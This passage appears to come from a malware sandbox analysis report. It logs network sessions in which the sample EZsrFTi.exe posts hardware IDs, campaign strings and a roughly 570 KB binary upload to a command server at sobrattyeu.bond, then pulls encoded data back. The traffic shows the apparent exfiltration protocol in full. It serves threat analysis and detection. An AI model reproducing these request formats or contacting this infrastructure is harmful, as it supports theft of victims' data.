                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppmG9F4PV%2FuBb5AwCg%2B8ynmf1GyexoQ3mgWAJVGWMIvRkBXGt2YS2w2C%2FW%2FDG1LDTU8DesYLc7vHUgmYCGk6cnUkw3Za35izymqjOVBWxGaNvXIddGml4W859Z1OgIQRCqU%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277bc47a9c4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1714&rtt_var=712&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21401&delivery_rate=1466599&cwnd=180&unsent_bytes=0&cid=aecc040b960119b8&ts=1240&x=0"
                            2025-01-15 17:11:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                            Data Ascii: fok 8.46.123.189
                            2025-01-15 17:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.1149742104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:12 UTC273OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=IFG25ELB7RX
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 1343
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:12 UTC1343OUTData Raw: 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 39 30 0d 0a 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d
                            Data Ascii: --IFG25ELB7RXContent-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--IFG25ELB7RXContent-Disposition: form-data; name="pid"1--IFG25ELB7RXContent-Disposition: form-data; name="lid"yau6Na--7329910690--IFG25ELB7RX
                            2025-01-15 17:11:13 UTC1124INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=j6bdn75oiranuda7rvslr6ho4p; expires=Sun, 11 May 2025 10:57:52 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVJyHBwUQlgJjJdo79E1NT7ubrMRKUhpQMxA2BeGl%2BSXuefJ42ugGNWe34AZYmgZL%2FKNDk1d4IDTZcoNiQjTp9PVate5Ns44ijOZlg6iJl0heMiucIYX3wiw6W12%2BXv6XCY%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277bd1cf4a7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1941&rtt_var=750&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2252&delivery_rate=1504379&cwnd=218&unsent_bytes=0&cid=33da2e16acd18b8d&ts=566&x=0"
                            2025-01-15 17:11:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                            Data Ascii: fok 8.46.123.189
                            2025-01-15 17:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.1149750104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:14 UTC282OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=13F9SI98ZYOYF9V467
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 570166
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 2d 2d 31 33 46 39 53 49 39 38 5a 59 4f 59 46 39 56 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 31 33 46 39 53 49 39 38 5a 59 4f 59 46 39 56 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 33 46 39 53 49 39 38 5a 59 4f 59 46 39 56 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39
                            Data Ascii: --13F9SI98ZYOYF9V467Content-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--13F9SI98ZYOYF9V467Content-Disposition: form-data; name="pid"1--13F9SI98ZYOYF9V467Content-Disposition: form-data; name="lid"yau6Na--73299
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 8f bd 72 23 4b 18 82 3d 50 63 2d 07 61 52 26 54 ba e1 56 be 81 01 c2 23 32 cb 59 04 01 a1 43 ef 5f 28 4f 62 04 0b 7a 9f b6 61 26 c4 db 4f e1 72 f9 a9 a5 e8 41 4e 60 96 be e9 64 0d 48 de 9d 73 ea 43 6f e2 95 ee 88 6f 5f 38 4c 56 a6 21 a5 e8 07 12 5b 4d 15 a3 35 ba 55 44 e0 6e f3 59 a3 57 30 17 a1 59 f9 96 76 21 df 14 ad ca 27 1c 79 00 79 73 e0 c2 43 ae 82 48 81 84 79 1e 10 a7 84 81 71 3b d8 cd 5e ae 1d bd 03 73 16 9b bd 07 40 e5 dc ca ff 62 e8 7f 37 db c0 23 bb 1d b8 e2 41 8c 3e 25 cf 17 30 e2 78 c0 39 d8 3f 22 18 c7 f9 43 ba d6 de 77 e6 10 66 53 3e 98 f5 86 1b 75 9f 36 f9 34 65 9b 0b 08 d7 d2 03 40 47 f9 ce dc 35 5d a0 31 f7 42 e9 67 57 b8 86 ca 40 a4 0b bd 56 92 70 72 d9 5e 02 7d e5 b3 7d ab 98 55 ce 1c 7a 81 12 0b 39 7f 91 f1 d8 0c 1e df 3a cd 4e f9 22
                            Data Ascii: r#K=Pc-aR&TV#2YC_(Obza&OrAN`dHsCoo_8LV![M5UDnYW0Yv!'yysCHyq;^s@b7#A>%0x9?"CwfS>u64e@G5]1BgW@Vpr^}}Uz9:N"
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 70 23 38 71 10 20 aa 95 08 33 5d d8 97 c8 79 0c 4c 94 23 e0 78 ab 11 d8 b6 7e 73 96 ab 11 5e 38 6a fe 29 4e 5f 5b b5 a3 7c ab 8f 2d 21 bf 42 4d 49 ba 30 26 0a 26 02 37 f3 5e 5d 7c 92 cb 7d 00 eb 73 46 95 fd 68 3f 7d 66 09 dd cc 1a 37 74 66 1a e8 5a ac e9 fb 35 fb a9 38 64 b4 81 4f 58 19 4e 0c 07 c3 55 35 7f 44 3e 0c 86 bd 03 46 13 83 1a 32 5e 2a 0a 3e fc 12 81 c6 0c cd 3f 6c 8d cd 4a 68 6b bc 2f c4 3b 90 38 f2 aa 34 5f 71 ad a0 c0 7c f4 26 d7 e9 7b 74 65 45 f0 f2 24 4e 32 6f 57 cf 08 e6 d8 43 f5 9d fb e2 0f 2b 60 65 05 5b 25 c3 6e f7 47 85 e9 a5 a0 17 f4 7b d6 9d 6d 43 79 20 fa bd 1b 87 a8 dc db 57 77 3f db bb 7a d8 97 dd ad ae 58 a8 35 1e 0e e7 d3 9b 92 f6 63 40 cc f4 9a 90 ae 3f 53 74 be d4 d3 b7 14 d1 14 4a 8d c4 dd aa af b6 21 5f 9e 2e a4 78 b5 79 be
                            Data Ascii: p#8q 3]yL#x~s^8j)N_[|-!BMI0&&7^]|}sFh?}f7tfZ58dOXNU5D>F2^*>?lJhk/;84_q|&{teE$N2oWC+`e[%nG{mCy Ww?zX5c@?StJ!_.xy
                            2025-01-15 17:11:14 UTC15331OUTData Raw: e4 7f bf 7c 2d 2b 99 da 34 bc 6b ca 10 a0 b5 a1 02 73 9e 43 52 70 d7 bb ca 85 45 ab 5d 9f 06 62 36 25 be eb 37 af b7 de 32 e7 fb 07 40 aa 80 f5 80 2b 5c f5 d3 65 17 c9 6c ad f4 5f ff 80 08 92 b5 56 75 e3 35 a6 04 db 7e 3d 9c 55 9a ba fa 75 8a 19 3e 78 7d a6 75 7f 75 e6 23 69 d8 49 c1 69 23 c0 d8 62 c1 e8 f1 52 41 ae 05 99 a2 38 8e 11 c2 e0 67 fe 83 db 2f e8 43 14 2a 99 16 c2 03 4b 60 84 8e 81 6e 01 81 99 b8 cb f1 36 62 25 56 47 04 90 a5 81 b2 18 af 40 30 4e 16 31 af e3 53 7c 4e 6a 8e c0 d4 7e 30 a3 b7 b9 f2 e2 3d 0e 14 69 84 ef 4b 2e ad 50 2a 42 81 bd fc 80 17 f2 15 43 40 4b f0 8f 66 4c 21 96 d8 f9 d3 5a 18 48 bc f3 1d 8c fe 39 36 70 41 1e be 67 69 71 44 05 f9 4a ff d3 a7 fa 33 0d 12 b6 75 ee db ad 2a b0 8f ea 6c 4c c8 ad e3 f0 00 8a 0a 4f 52 f2 cb 6e 75
                            Data Ascii: |-+4ksCRpE]b6%72@+\el_Vu5~=Uu>x}uu#iIi#bRA8g/C*K`n6b%VG@0N1S|Nj~0=iK.P*BC@KfL!ZH96pAgiqDJ3u*lLORnu
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 59 00 78 81 34 f3 8d 18 8f 28 f8 84 3f 9a 51 23 d3 d3 d1 ad 56 43 64 4e 4c f0 97 02 fd dd 1f 19 10 cc 27 a0 0a 5e 7f b0 1c 87 ce f0 61 57 9e ff a8 4a 1a 41 a6 60 cb 7c c1 4f c7 5a 64 f4 23 a8 89 e2 78 4f 6d 04 27 ec c1 86 14 cb db 40 69 ee a0 d8 4d eb f9 6f e1 58 52 ad 11 30 a0 6d 9d 9a 48 7d c9 35 b3 32 8f 4c 2d 66 f7 36 69 30 ed f2 cd 51 5c 1b 70 d9 82 4c c0 5e 5b c0 41 8a f6 54 40 8d 42 6d 13 40 6d fc dc 89 c7 e3 5d f1 2e 44 5a 3f 23 29 af c7 d8 80 4c d2 db 94 9a c5 d2 95 47 9d 0d 6c b6 ca 28 13 95 b6 bf a1 59 1a cb f6 53 25 4a 9e 22 48 65 67 93 74 b0 04 78 bf 14 07 e2 0b 30 fe b7 a1 34 3d 9e 80 4e cc 68 04 85 92 d5 93 a0 e9 98 cc 6d 7c 1e 82 81 1f e1 bd d4 14 93 a9 de a8 f7 5e ea 62 9b e7 3d a4 42 3d 0c be 33 e6 2b 3f 31 c5 67 6c e9 2e b2 0f f7 ca 0a
                            Data Ascii: Yx4(?Q#VCdNL'^aWJA`|OZd#xOm'@iMoXR0mH}52L-f6i0Q\pL^[AT@Bm@m].DZ?#)LGl(YS%J"Hegtx04=Nhm|^b=B=3+?1gl.
                            2025-01-15 17:11:14 UTC15331OUTData Raw: d0 64 2a 70 e4 e7 76 ef d3 03 6d 68 6b 81 de b4 02 b1 72 6c 91 de db b1 5a bb 68 79 29 55 95 3b 38 61 f3 2b 91 45 22 5c 08 61 24 fc b2 80 60 53 95 22 13 de 89 20 98 38 eb 93 5c 23 0f 9d f0 60 9a 95 f2 68 bf 35 29 26 99 24 da 8b 98 50 23 3c 61 e5 6e 7f 50 25 26 2a 0e ed 7d 4a 6e 05 37 6e 21 3e 30 3e 1e 52 ae 9a ef e3 46 4a 53 79 14 93 4f f9 6a 61 11 28 fe 6b 47 dd 0d c6 01 ed fa 10 e3 ca 04 f8 9e ff 5a c0 a3 34 23 c4 a7 8e 9b 2b 7d 9f 1c 37 1d 1f 94 c8 bb 6c 5b e7 c8 a2 fa c8 95 38 44 cf 59 82 af 70 f1 02 4f 6e bd ed 0f 41 df bd 89 69 50 13 0e 2d 4b 8d 34 43 75 32 d4 d4 43 e2 b1 46 ab 9d db 72 7e 93 3a ef 4a 60 6b 1d 74 2b cd 13 05 40 a4 3d 30 56 2f 6e de c9 7e e0 54 b1 fe 8e bf ab 02 96 55 94 45 2e 09 5b 9f 08 c9 2f c5 3b 02 04 b5 6e 01 d7 30 5d 66 5a 5d
                            Data Ascii: d*pvmhkrlZhy)U;8a+E"\a$`S" 8\#`h5)&$P#<anP%&*}Jn7n!>0>RFJSyOja(kGZ4#+}7l[8DYpOnAiP-K4Cu2CFr~:J`kt+@=0V/n~TUE.[/;n0]fZ]
                            2025-01-15 17:11:14 UTC15331OUTData Raw: d1 00 26 bb f4 d4 24 c9 47 c7 98 75 c8 1a 4b c2 8e b9 1b fb 0b 5b 4c 4c 33 23 1d 5d 38 e9 cf 88 9d 8e 0f 7f 6e 71 49 fd 16 75 62 e7 d0 45 a1 e7 94 f3 41 67 d4 fe 69 20 c4 e5 1e 61 75 b7 19 a7 38 75 4c 5f bb d6 28 ff d2 db bd fc c7 9b 07 6f 52 28 9f 73 dd 72 4f a9 10 ca 2e db bf d5 88 69 8d 65 52 d7 43 74 42 48 0e 2b 4e 2f c7 ef c8 96 bf cd e8 ff 11 a6 be f6 e0 71 9c 9b dc 91 2f 88 af ed 41 a9 c4 23 33 57 83 f6 6b 8a 28 5e d8 67 b0 56 a3 b7 7f c9 e5 f8 4c de e3 ec 85 a2 91 b5 36 4f cc 99 29 8d c6 b8 53 29 08 48 a4 fd e4 16 35 07 21 ec dd 86 c0 8a c4 ff 8a a1 0e 46 78 86 1a ed 7e 77 da c6 69 f7 cb 61 a3 c2 27 84 b8 da eb 7f 0b fe 39 d9 e1 a6 34 f9 a0 52 bd bc 98 7c 7f fc 81 cd b2 8b 1d c1 20 ca 8c 97 dd 7d 99 3e 2d 9c d7 fe aa 32 e0 e9 91 d9 37 c7 ff 88 14
                            Data Ascii: &$GuK[LL3#]8nqIubEAgi au8uL_(oR(srO.ieRCtBH+N/q/A#3Wk(^gVL6O)S)H5!Fx~wia'94R| }>-27
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 1f 7e 0a 63 97 3f b5 8d 39 21 ef 4b 29 c6 6b 97 15 49 03 3e a6 cc 3d 12 0b f5 5b 1e a2 d8 f1 7e 1b 2a 15 71 8a e5 ec 14 22 0b 55 b6 16 f5 9f 83 73 67 18 01 bc 92 fa 89 06 69 ca 43 da 78 60 1c bf ca f7 0b 20 c2 f9 c1 b6 e4 71 26 7a be fd 19 01 1b 9b 2a ea 21 48 42 c4 54 1f c2 a2 1a 1f d1 e2 f9 24 36 7c 6f 94 89 8e f5 f7 eb be 28 a5 04 ae fd fc 4c 49 c0 16 69 3c df e1 0f 7e b2 2d 89 71 81 06 18 7f 11 b2 c7 2c 37 e8 79 a0 f2 20 3b 8a 7a 1a df b8 28 aa c7 fb fc fb 17 8a 6c 62 64 42 4a 40 bf 89 4a 4e ac 39 b8 a4 6d 42 96 a6 eb ac 08 b6 22 c1 39 81 96 45 27 25 a0 3c a7 65 b4 c8 4c 23 e7 76 39 8f f4 48 01 ee b8 78 71 11 f2 cd c4 a7 a1 ad 5d ec 9c 77 c3 56 63 7c 67 e3 56 ae 17 c6 26 6c 9a 60 68 d1 a1 18 b8 94 18 cd 39 24 ff b6 e5 57 30 35 d9 77 e4 a7 67 0c ac 1f
                            Data Ascii: ~c?9!K)kI>=[~*q"UsgiCx` q&z*!HBT$6|o(LIi<~-q,7y ;z(lbdBJ@JN9mB"9E'%<eL#v9Hxq]wVc|gV&l`h9$W05wg
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 37 e8 f7 a1 27 51 be 86 d5 3d 9a 48 70 ba 71 ad 38 65 89 87 64 11 02 a1 77 93 8a 95 c2 d3 e6 52 3c d7 77 10 7e cb a7 c1 84 ce 80 0c 15 28 ab 14 f5 c1 d8 65 17 5e 23 9b e9 0d e2 7e 46 24 a3 c8 28 12 36 1a 8e d4 3b 6c b4 a1 5d 22 82 a4 be 06 f8 c6 bf 93 f9 14 43 c4 50 48 8c 96 cd 8c 1f 40 4d 8b 7d 17 5b ff 79 d3 d9 7b 61 e4 28 89 6e 5c e5 3e b6 79 0d 5d f0 f0 0e cb 7f c6 bd fb 2a eb 7f f7 c4 db 00 75 f4 c7 01 a1 ff bb f3 62 2c 57 4c b0 03 0a e6 c7 1c 9f b7 3d c3 07 b6 89 bc bd 7e 04 7b 51 6b 1b d1 5a ca 9d ff c2 57 b3 7e fc bb da 73 1e d2 9f 8d 3e c6 8a b9 a2 98 b2 9c f3 5b fd 73 94 21 65 14 13 79 e7 fa 36 e6 3f 5b 05 d8 06 02 9c 47 50 dc cf 48 eb 54 74 6e c1 5c 59 b3 67 f3 a6 db 86 8c af 0b 7c b4 3e c4 bf 8d a2 c0 39 0f f4 c4 fb 22 e5 39 3b 80 99 7e 5c 5e
                            Data Ascii: 7'Q=Hpq8edwR<w~(e^#~F$(6;l]"CPH@M}[y{a(n\>y]*ub,WL=~{QkZW~s>[s!ey6?[GPHTtn\Yg|>9"9;~\^
                            2025-01-15 17:11:14 UTC15331OUTData Raw: 33 75 99 75 a4 40 39 ce 30 a9 bb 81 4a f5 79 e0 5b bc 65 3d 31 cf fd 09 0d c8 18 d2 91 0b aa f2 43 2e 0b ca 3c 93 cc a0 68 6a 09 2f 61 19 78 0f 44 c9 05 52 19 81 6d a5 e7 8a 33 c6 84 ca c6 bf bf 43 01 c7 f1 e1 a1 a1 64 6e d2 45 a6 6e d5 5a 72 2d 85 d3 b0 63 e9 c4 4b 3a 02 c5 15 fd ad 2e 03 1b e5 06 0f 01 c5 1b 1a e4 07 6b 3c c5 6f 10 a0 5a da 01 76 5a 01 8c 43 5c 37 91 59 79 bd 36 25 3f f3 27 28 94 c3 68 95 44 79 95 01 7a a0 0e 44 47 8d 54 ef f8 ba 95 82 84 01 d5 9b 2d cc d6 5f ed 71 99 0f ac de 4c 2f 5f 6a d5 1d 28 d6 ff df e8 30 37 a4 bd 13 03 ad 92 4a ff db 00 3d 2b 0a 56 f9 21 37 5d 90 d7 8a e9 ef da 8b e3 aa 89 0f 3c 0a 7f 1d e3 f9 d5 56 ac bc 7b 77 e3 90 9a dc 09 7f af 46 ac e4 9a 6f 7b 23 cf 8e ef b9 c4 ef 26 80 47 99 cc 88 b9 51 9f 59 c6 be 74 9e
                            Data Ascii: 3uu@90Jy[e=1C.<hj/axDRm3CdnEnZr-cK:.k<oZvZC\7Yy6%?'(hDyzDGT-_qL/_j(07J=+V!7]<V{wFo{#&GQYt
                            2025-01-15 17:11:16 UTC1127INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=3322r7t52n7jm1rarkfcf8d3n4; expires=Sun, 11 May 2025 10:57:54 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhmXwAQwGnLh9XOBCeeQFSezvFvfLrlecb512jYACYxwCxkAN9eOiGRhYn8b%2BWbBcXoyBzBtAdzRW7hhJEfXYIqq7JR5hjrEsC0hQccJK1jN4iluUgddztnBBkltUmX6G8s%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277bdaaf0b8ca1-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1929&rtt_var=746&sent=199&recv=590&lost=0&retrans=0&sent_bytes=2836&recv_bytes=572712&delivery_rate=1444829&cwnd=168&unsent_bytes=0&cid=792eb50bfe1fcece&ts=1950&x=0"


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.1149769104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:16 UTC263OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 87
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:16 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 39 30 26 6a 3d 26 68 77 69 64 3d 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34
                            Data Ascii: act=get_message&ver=4.0&lid=yau6Na--7329910690&j=&hwid=E2AD60005361D2860522D5E87E3CC394
                            2025-01-15 17:11:17 UTC1129INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=fvgvbo1u6nmcb4m6bubd7q55u8; expires=Sun, 11 May 2025 10:57:56 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSUgxCNe%2FbbC1ab%2BELm4Nb03mxUj1FPJyxk4gdgSHdGiygrGk%2Bl1LmWRKkQmbRiyjh9nyDXGrIB7Qn18JSe4Ua2E7Yyq%2BPoDsDh1IYEvQhZs17yON%2BeLAJt82KkHFk%2FZivw%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277be9cf9c4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1705&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=986&delivery_rate=1690793&cwnd=180&unsent_bytes=0&cid=77a79172396ffe26&ts=789&x=0"
                            2025-01-15 17:11:17 UTC240INData Raw: 33 36 65 34 0d 0a 31 63 34 6b 31 64 77 71 58 6f 56 66 4b 75 73 39 57 6c 46 59 30 64 2f 33 36 66 71 74 59 58 32 4b 2f 63 37 41 54 6a 74 73 70 6b 65 4f 74 51 61 7a 71 41 68 6b 74 48 4d 49 6a 68 39 67 59 48 54 7a 75 39 58 54 32 4f 6b 67 4f 76 79 4e 70 62 41 4b 44 43 62 63 47 2f 72 6c 61 49 47 57 45 32 37 33 4d 78 6a 53 56 6d 38 53 43 70 79 34 72 37 75 4e 2b 68 4d 71 7a 34 58 37 6d 67 67 4f 52 35 35 2b 6c 35 6b 64 73 4c 46 35 62 74 55 73 52 4c 74 4c 62 69 55 56 76 2b 79 6b 6e 4b 4c 50 55 79 6e 68 74 34 75 35 44 46 38 6b 35 43 57 68 6c 33 43 64 73 45 45 47 36 32 68 51 6e 45 6f 59 49 32 36 4c 6c 4b 62 43 67 38 34 39 55 74 62 53 70 2f 41 33 58 51 6a 74 63 72 47 34 66 70 71 4e 51 51 72 4d 47 52 71 49 65 79 74 67 4d 4a
                            Data Ascii: 36e41c4k1dwqXoVfKus9WlFY0d/36fqtYX2K/c7ATjtspkeOtQazqAhktHMIjh9gYHTzu9XT2OkgOvyNpbAKDCbcG/rlaIGWE273MxjSVm8SCpy4r7uN+hMqz4X7mggOR55+l5kdsLF5btUsRLtLbiUVv+yknKLPUynht4u5DF8k5CWhl3CdsEEG62hQnEoYI26LlKbCg849UtbSp/A3XQjtcrG4fpqNQQrMGRqIeytgMJ
                            2025-01-15 17:11:17 UTC1369INData Raw: 79 36 72 35 6d 66 79 78 63 74 79 35 58 36 6c 6a 39 2b 48 70 56 79 67 34 5a 42 68 4a 42 39 47 4d 6f 79 58 35 4e 4f 62 52 4d 54 6d 6f 69 35 75 72 66 44 46 52 62 77 76 4c 6d 53 4a 6b 30 74 2f 69 75 30 6a 42 43 63 76 78 6b 61 35 44 56 74 73 51 55 75 65 67 72 6a 71 70 71 54 75 4d 38 44 53 76 36 37 6c 4c 51 71 58 46 6d 54 44 35 65 73 48 5a 2b 59 59 6a 4b 32 42 30 43 33 45 69 41 72 4d 4b 47 6e 7a 36 2b 78 2f 45 6f 45 36 61 48 68 6e 47 46 53 58 4e 38 56 73 59 55 52 69 66 4e 59 44 63 6f 65 53 62 39 30 48 32 45 37 6c 36 37 47 6d 37 66 49 4e 69 2f 76 6d 37 69 51 43 6e 6b 72 30 44 65 2b 76 6e 44 69 6c 6c 41 43 71 6e 52 6d 76 33 64 6a 59 53 71 39 70 73 36 43 69 75 34 7a 4d 4f 32 6c 74 72 63 5a 53 6c 37 6a 50 2b 43 55 59 75 44 33 45 6d 62 4f 48 6b 76 41 55 41 6b 36 43
                            Data Ascii: y6r5mfyxcty5X6lj9+HpVyg4ZBhJB9GMoyX5NObRMTmoi5urfDFRbwvLmSJk0t/iu0jBCcvxka5DVtsQUuegrjqpqTuM8DSv67lLQqXFmTD5esHZ+YYjK2B0C3EiArMKGnz6+x/EoE6aHhnGFSXN8VsYURifNYDcoeSb90H2E7l67Gm7fINi/vm7iQCnkr0De+vnDillACqnRmv3djYSq9ps6Ciu4zMO2ltrcZSl7jP+CUYuD3EmbOHkvAUAk6C
                            2025-01-15 17:11:17 UTC1369INData Raw: 4b 70 6f 49 39 55 75 50 4e 74 36 59 71 63 46 6e 43 4d 59 2b 42 64 62 36 49 59 78 69 31 50 47 79 61 44 44 49 63 50 59 61 4e 6b 6f 2b 4d 2f 53 55 38 7a 59 75 2b 71 7a 35 2f 57 2b 77 39 69 65 45 50 6d 59 68 67 5a 37 55 74 52 74 6b 45 4d 57 51 62 67 35 4b 51 73 61 6a 61 4e 67 2f 64 75 4c 62 31 46 48 31 5a 6a 58 2f 74 67 32 57 30 39 30 63 4e 37 67 39 5a 68 57 30 47 66 6d 79 6c 6b 70 6e 61 71 64 67 35 48 37 69 70 70 59 6f 4c 51 69 37 43 44 35 65 76 55 49 79 49 59 6a 4c 75 42 30 54 63 52 79 30 6d 47 71 50 70 72 61 4b 72 68 68 67 65 31 74 4b 53 37 79 63 4c 46 63 41 6a 6e 76 74 41 6f 34 5a 6c 44 2b 34 4c 59 36 30 4e 4f 52 63 70 34 4c 65 36 6a 4b 33 2f 42 42 76 38 72 59 71 42 43 55 30 63 7a 54 65 52 2b 57 36 76 67 41 56 31 79 51 74 67 30 67 30 6f 50 57 72 6f 74 4d
